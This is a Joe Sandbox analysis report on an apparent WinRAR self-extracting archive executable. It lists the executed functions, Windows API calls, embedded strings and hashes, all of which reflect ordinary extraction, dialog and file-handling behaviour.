Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.3%
Total number of Nodes:	1654
Total number of Limit Nodes:	24

Executed Functions

Function 0018B2FE Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 252
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0017A590: GetModuleHandleW.KERNEL32(kernel32,B19080A7), ref: 0017A5DC
Part of subcall function 0017A590: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0017A5EE
Part of subcall function 0017A590: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0017A618

Part of subcall function 00175D94: __EH_prolog3.LIBCMT ref: 00175D9B
Part of subcall function 00175D94: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00176209,?,000000FF,\\?\,B19080A7,?,000000FF,?,?,0019FF80,000000FF), ref: 00175DA4

Part of subcall function 0018655D: OleInitialize.OLE32(00000000), ref: 00186576
Part of subcall function 0018655D: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001865AD
Part of subcall function 0018655D: SHGetMalloc.SHELL32(001CAA78), ref: 001865B7

GetCommandLineW.KERNEL32 ref: 0018B3BC
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 0018B403
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 0018B415
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0018B423
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 0018B431

Part of subcall function 00186BF9: __EH_prolog3.LIBCMT ref: 00186C00

Part of subcall function 0018AE2D: __EH_prolog3_GS.LIBCMT ref: 0018AE34
Part of subcall function 0018AE2D: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 0018AE4C
Part of subcall function 0018AE2D: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 0018AEB7

Part of subcall function 00178D34: _wcslen.LIBCMT ref: 00178D58

UnmapViewOfFile.KERNEL32(00000000,001CAB80,00000400,001CAB80,001CAB80,00000400,00000000,00000001,?,00000000), ref: 0018B480
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0018B487
SetEnvironmentVariableW.KERNEL32(sfxname,001AE668,00000000), ref: 0018B4E3
GetLocalTime.KERNEL32(?), ref: 0018B4EE
_swprintf.LIBCMT ref: 0018B52D
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0018B542
GetModuleHandleW.KERNEL32(00000000), ref: 0018B549
LoadIconW.USER32(00000000,00000064), ref: 0018B560
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00017860,00000000), ref: 0018B5B7
Sleep.KERNELBASE(00001B58), ref: 0018B5E8
DeleteObject.GDI32 ref: 0018B60C
DeleteObject.GDI32(00050EC9), ref: 0018B61C

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Part of subcall function 0018894E: __EH_prolog3_GS.LIBCMT ref: 00188955

CloseHandle.KERNEL32 ref: 0018B65E

Strings

sfxname, xrefs: 0018B4DE
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0018B51E
sfxstime, xrefs: 0018B53D
winrarsfxmappingfile.tmp, xrefs: 0018B3F7
STARTDLG, xrefs: 0018B5AC

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3142445277-3710569615
Opcode ID: 384424170f510d53a0418990a60e8d2fc9aecae1b362a0bf93d4d4652293c141
Instruction ID: 96936ee457ec947a9e4fef3c756700996d1482274a73ccc8db336cbb6709771e
Opcode Fuzzy Hash: 384424170f510d53a0418990a60e8d2fc9aecae1b362a0bf93d4d4652293c141
Instruction Fuzzy Hash: F4919EB1508348AFC321BB64DC8AFAF7BE8AF59705F40481DF54992591EB34DA84CF62

Function 00185C5C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001877A5,00000066), ref: 00185C6F
SizeofResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C86
LoadResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185C9D
LockResource.KERNEL32(00000000,?,?,?,001877A5,00000066), ref: 00185CAC
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CC7
GlobalLock.KERNEL32(00000000,?,?,?,?,?,001877A5,00000066), ref: 00185CD8
GlobalUnlock.KERNEL32(00000000), ref: 00185D60

Part of subcall function 00185BD6: GdipAlloc.GDIPLUS(00000010), ref: 00185BDC

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00185D41
GlobalFree.KERNEL32(00000000), ref: 00185D67

Strings

PNG, xrefs: 00185C60

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 3a8ec618386101f5133bccb44293b5d1005f15a16f018cefd70677bedff7e6ed
Instruction ID: d5ddb74ffe7da28208f69690883f700fa2aaee23e436094e42bd956572afc236
Opcode Fuzzy Hash: 3a8ec618386101f5133bccb44293b5d1005f15a16f018cefd70677bedff7e6ed
Instruction Fuzzy Hash: 93317E71600A06AFC311AF65DC4CD1BBFAAFF867517044619FD0692661EB31DD40CFA1

Function 0017720F Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON

Download Yara Rule

APIs

Part of subcall function 0017B976: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0017B946,?,?,?,?,0000000C), ref: 0017B992

_wcslen.LIBCMT ref: 0017760C
__fprintf_l.LIBCMT ref: 00177759

Strings

@%s:, xrefs: 00177743, 0017774F
RTL, xrefs: 0017771B
*messages***, xrefs: 00177425
,, xrefs: 00177794
*messages***, xrefs: 001773EC
$%s:, xrefs: 0017773C

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_wcslen
String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
API String ID: 1796436225-285229759
Opcode ID: 00b2dbad5dd79c5c1224311ee6ecd499251be49323516d5fd3f3bcbe07f9b441
Instruction ID: b33be88b6f0a1b7d6f7e64782ebf7660275f8170f8a9867bf1c76e84ab4ff102
Opcode Fuzzy Hash: 00b2dbad5dd79c5c1224311ee6ecd499251be49323516d5fd3f3bcbe07f9b441
Instruction Fuzzy Hash: 7152E471904219ABDF24DFA8CC85AEEB7B5FF14310F50852AF519EB2C1E7709A41CBA0

Function 00174D8A Relevance: 9.1, APIs: 6, Instructions: 139
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00174D94
FindFirstFileW.KERNELBASE(?,-00000278,00000274,00174C97,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174DBD
FindFirstFileW.KERNELBASE(-00000028,-00000278,?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E08
GetLastError.KERNEL32(?,-00000028,?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E66
FindNextFileW.KERNEL32(?,-00000278,00000274,00174C97,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174E91
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0018114C,00000000), ref: 00174E9E

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$H_prolog3_Next
String ID:
API String ID: 3831798110-0
Opcode ID: d99db5f89ba94827db764bac8ede56731ddfb498ff6c76712ff167852c7d6e4c
Instruction ID: 33b62773c8c3a702573ce076c780e9ae2ecce6e333311c83045f83b1efc94e42
Opcode Fuzzy Hash: d99db5f89ba94827db764bac8ede56731ddfb498ff6c76712ff167852c7d6e4c
Instruction Fuzzy Hash: E0513E71904619DFCF14DF68C889AEDB7B9BF19320F148299E419E3690DB34AE84CF61

Function 001953C2 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001963DC,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002,00000000,?,001963DC), ref: 001953E3
TerminateProcess.KERNEL32(00000000,?,00195398,001963DC,001AC1F0,0000000C,001954EF,001963DC,00000002,00000000,?,001963DC), ref: 001953EA
ExitProcess.KERNEL32 ref: 001953FC

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2ec6cdee06e4a8d10ccd3c6ac6c0dac172c981f56ce3855fcd6aacfa3365fb26
Instruction ID: 57f2c7939974a142283b4471968ec30b6d9f4ffab902cebf6537635d012f0425
Opcode Fuzzy Hash: 2ec6cdee06e4a8d10ccd3c6ac6c0dac172c981f56ce3855fcd6aacfa3365fb26
Instruction Fuzzy Hash: A8E0B631100648ABCF126F68DD09A593B6AFF61791B404414FD46AB922CB75ED92CB80

Function 0017E3FB Relevance: 1.9, APIs: 1, Instructions: 352COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0017E4C0

Part of subcall function 0017F4EE: __EH_prolog3_GS.LIBCMT ref: 0017F4F5

Part of subcall function 00174235: __EH_prolog3_GS.LIBCMT ref: 0017423C

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3_$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4214654750-0
Opcode ID: 8eca02f85094ad7277f055875b42285bf44a03e9febb2285688c19455808c85a
Instruction ID: 68c546e3784d3bf7b82ed9ff53aec88cb40c6ce2b6548af28c9b83a2c9eb62c9
Opcode Fuzzy Hash: 8eca02f85094ad7277f055875b42285bf44a03e9febb2285688c19455808c85a
Instruction Fuzzy Hash: 72D1C2B49043549BD726DF28AC45B2A3BF5FF5C318F888299F459836A2D73098C1CB93

Function 00187860 Relevance: 88.4, APIs: 43, Strings: 7, Instructions: 935windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0018786A

Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2

EndDialog.USER32(?,00000000), ref: 00187978
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001879B7
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001879D1
IsDialogMessageW.USER32(?,?), ref: 001879E4
TranslateMessage.USER32(?), ref: 001879F2
DispatchMessageW.USER32(?), ref: 001879FC
EndDialog.USER32(?,00000001), ref: 00187A3E
GetDlgItem.USER32(?,00000068), ref: 00187A64
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00187A7F
SendMessageW.USER32(00000000,000000C2,00000000,001A2668), ref: 00187A92
SetFocus.USER32(00000000), ref: 00187A99
GetLastError.KERNEL32(00000000,?), ref: 00187B80
GetLastError.KERNEL32(00000000,?), ref: 00187BAC
GetTickCount.KERNEL32 ref: 00187BD9
GetLastError.KERNEL32 ref: 00187C35
GetCommandLineW.KERNEL32 ref: 00187D59
_wcslen.LIBCMT ref: 00187D66
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,001CAB80,00000400,00000001,00000001), ref: 00187DE5
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00187E03
ShellExecuteExW.SHELL32(0000003C), ref: 00187E3C
WaitForInputIdle.USER32(?,00002710), ref: 00187E6B
Sleep.KERNEL32(00000064), ref: 00187E85
UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,001CAB80,00000400), ref: 00187EC1
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,001CAB80,00000400), ref: 00187ECD
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00187FD2

Part of subcall function 00171B53: GetDlgItem.USER32(?,?), ref: 00171B68
Part of subcall function 00171B53: ShowWindow.USER32(00000000), ref: 00171B6F

SetDlgItemTextW.USER32(?,00000065,001A2668), ref: 00187FEA
GetDlgItem.USER32(?,00000065), ref: 00187FF3
GetWindowLongW.USER32(00000000,000000F0), ref: 00188002
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_00017630,00000000,?), ref: 00188382
EndDialog.USER32(?,00000001), ref: 00188396
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00188011

Part of subcall function 00185335: __EH_prolog3_GS.LIBCMT ref: 0018533C
Part of subcall function 00185335: ShowWindow.USER32(?,00000000,00000038), ref: 00185364
Part of subcall function 00185335: GetWindowRect.USER32(?,?), ref: 001853A8
Part of subcall function 00185335: ShowWindow.USER32(?,00000005,?,00000000), ref: 00185443

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001880AF
SendMessageW.USER32(?,00000080,00000001,00030479), ref: 001881E4
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050EC9), ref: 001881FD
GetDlgItem.USER32(?,00000068), ref: 00188206
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0018821E
GetDlgItem.USER32(?,00000066), ref: 00188246
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 001882BD
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001882D1
EnableWindow.USER32(?,00000000), ref: 00188507
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00188548
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0018856D

Part of subcall function 00188CAF: __EH_prolog3_GS.LIBCMT ref: 00188CB9

Strings

<, xrefs: 00187CEE
-el -s2 "-d%s" "-sp%s", xrefs: 00187CD5
__tmp_rar_sfx_access_check_, xrefs: 00187BF1
LICENSEDLG, xrefs: 00188377
@, xrefs: 00187CF8
winrarsfxmappingfile.tmp, xrefs: 00187DD1
STARTDLG, xrefs: 0018787C

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
API String ID: 3616063595-3000381960
Opcode ID: beeaa16f08644b6876e70cf1437ddfee0a39859625c72007f5bc16f93258648f
Instruction ID: 42ce590cd4b181f8433ee21f2100f47c9c94abb423c770d155e1ac588ce67386
Opcode Fuzzy Hash: beeaa16f08644b6876e70cf1437ddfee0a39859625c72007f5bc16f93258648f
Instruction Fuzzy Hash: 5D72C270904248AEEB25EBA4DC49FEEBB79AF21304F544059F109B75D2DB748E84CF62

Function 0017A590 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32,B19080A7), ref: 0017A5DC
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0017A5EE
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0017A618
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0017A8DF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0017A8F4
ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 0017A914
CloseHandle.KERNEL32(00000000), ref: 0017A99C
CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 0017AA0D
AllocConsole.KERNEL32 ref: 0017AB73
GetCurrentProcessId.KERNEL32 ref: 0017AB7D
AttachConsole.KERNEL32(00000000), ref: 0017AB84
GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 0017ABA4
WriteConsoleW.KERNEL32(00000000), ref: 0017ABAB
Sleep.KERNEL32(00002710), ref: 0017ABB6
FreeConsole.KERNEL32 ref: 0017ABBC
ExitProcess.KERNEL32 ref: 0017ABCC

Strings

uxtheme.dll, xrefs: 0017AAD2
SetDefaultDllDirectories, xrefs: 0017A612
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 0017AB63
SetDllDirectoryW, xrefs: 0017A5E8
dwmapi.dll, xrefs: 0017A681, 0017AAC8
DXGIDebug.dll, xrefs: 0017A64C, 0017A9F5
kernel32, xrefs: 0017A5D3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 2644799563-3298887752
Opcode ID: 82262011584060d2354e03ff3e12dd869476126ff155347b45596b3d3d173a2c
Instruction ID: ebcb54ae14736be650fcc02d86fd3cab785161f13cd9947f82687fa77661bf7c
Opcode Fuzzy Hash: 82262011584060d2354e03ff3e12dd869476126ff155347b45596b3d3d173a2c
Instruction Fuzzy Hash: EFF17E7540028C9BCB25DF68CD49BDE3BB8BF56314F508119F949AB281DB709A49CBA1

Function 0018A4D2 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001875D8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001875E9
Part of subcall function 001875D8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001875FA
Part of subcall function 001875D8: IsDialogMessageW.USER32(0001048C,?), ref: 0018760E
Part of subcall function 001875D8: TranslateMessage.USER32(?), ref: 0018761C
Part of subcall function 001875D8: DispatchMessageW.USER32(?), ref: 00187626

GetDlgItem.USER32(00000068,00000000), ref: 0018A4F5
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00186CE1,00000001,?,?), ref: 0018A51A
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0018A529
SendMessageW.USER32(00000000,000000C2,00000000,001A2668), ref: 0018A537
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018A551
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0018A56B
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018A5AF
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0018A5C2
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0018A5D5
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0018A5FC
SendMessageW.USER32(00000000,000000C2,00000000,001A2690), ref: 0018A60B

Strings

\, xrefs: 0018A55B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 078020717cfff3de86959a2dc7524c7c4f6da8560d928ff5224763131783adc0
Instruction ID: 15968bf66cf74cb8fc7aa6021b3d7bb28c26fae97bb7af9e34609e411a2bcdb5
Opcode Fuzzy Hash: 078020717cfff3de86959a2dc7524c7c4f6da8560d928ff5224763131783adc0
Instruction Fuzzy Hash: EC310F71245300AFE310AF25DC59F6BBFA8EF5A304F48050AF54596291D770DE848BE6

Function 0018A800 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 291
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 0018A807
ShellExecuteExW.SHELL32(?), ref: 0018AA04
IsWindowVisible.USER32(?), ref: 0018AA2F
ShowWindow.USER32(?,00000000), ref: 0018AA3D
WaitForInputIdle.USER32(?,000007D0), ref: 0018AA4D
GetExitCodeProcess.KERNEL32(?,?), ref: 0018AA6F
CloseHandle.KERNEL32(?), ref: 0018AA93
ShowWindow.USER32(?,00000001), ref: 0018AAD6

Strings

.exe, xrefs: 0018AA9D
.inf, xrefs: 0018A973

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
String ID: .exe$.inf
API String ID: 3208621885-3750412487
Opcode ID: 56e18b9d94ad6db7d35b4845da5133e937128e7fa7763d4169e577fdfca208f6
Instruction ID: 2176bd00d9f583a8ef817343e7390a2aede858e9f824749e7d5f48543eaf1bae
Opcode Fuzzy Hash: 56e18b9d94ad6db7d35b4845da5133e937128e7fa7763d4169e577fdfca208f6
Instruction Fuzzy Hash: E7B1B031E00208DFEF15EF64CA84BED7BB5AF55314F94801AE844A7250E774AE86CF92

Function 0017CEA4 Relevance: 15.5, APIs: 3, Strings: 5, Instructions: 1525COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0017D739

Part of subcall function 0017CB19: _swprintf.LIBCMT ref: 0017CB52

__allrem.LIBCMT ref: 0017D7B1
_wcslen.LIBCMT ref: 0017DB92

Part of subcall function 0017C24D: __EH_prolog3_catch.LIBCMT ref: 0017C254

Part of subcall function 0017EE8E: __EH_prolog3_GS.LIBCMT ref: 0017EE98

Strings

zipx, xrefs: 0017D6B7
z01, xrefs: 0017D5BE, 0017D5C8
zx01, xrefs: 0017D5B7
zip, xrefs: 0017D6BE, 0017D6C8
AES-0017, xrefs: 0017D36C

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
